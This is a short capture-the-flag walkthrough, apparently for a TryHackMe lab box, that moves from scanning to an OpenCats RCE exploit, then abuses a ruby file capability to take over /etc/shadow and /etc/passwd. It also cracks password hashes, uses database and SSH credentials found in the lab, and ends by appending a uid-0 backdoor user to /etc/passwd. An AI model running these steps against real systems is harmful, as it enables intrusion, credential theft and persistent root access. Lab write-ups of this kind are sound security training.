Room Link:
Scans
Initial scan
Kali
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
Kali
echo "$VICTIM job.empline.thm" >> /etc/hosts
Initial Shell
OpenCats 0.9.4 has a RCE exploit.
Kali
chmod +x exploit.sh
./exploit.sh
./exploit.sh http://job.empline.thm/
Victim
getcap -r / 2>/dev/null
Victim
ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow
Victim
Now that we can read both f these files we can transfer them to Kali. I let this run for a while but it wasn't cracking any hashes.
cat /etc/passwd
cat /etc/shadow
Kali
unshadow passwd shadow > passwords.txt
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
I went back to the check the box and found the database credentials
Victim
find / -name "config.php"
cat /var/www/opencats/config.php
Kali
mysql -h $VICTIM -u james -png6pUFvsGNtw
Kali(mysql)
show databases;
use opencats
show tables;
select * from user;
There were a few hashes from users so I put them in crackstation and one returned a result.
TCP/22 - SSH
Kali
ssh george@$VICTIM
Password: pretonnevippasempre
Privilege Escalation
Since I had access to change any file already I just added a new root user to passwd
Victim
ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123
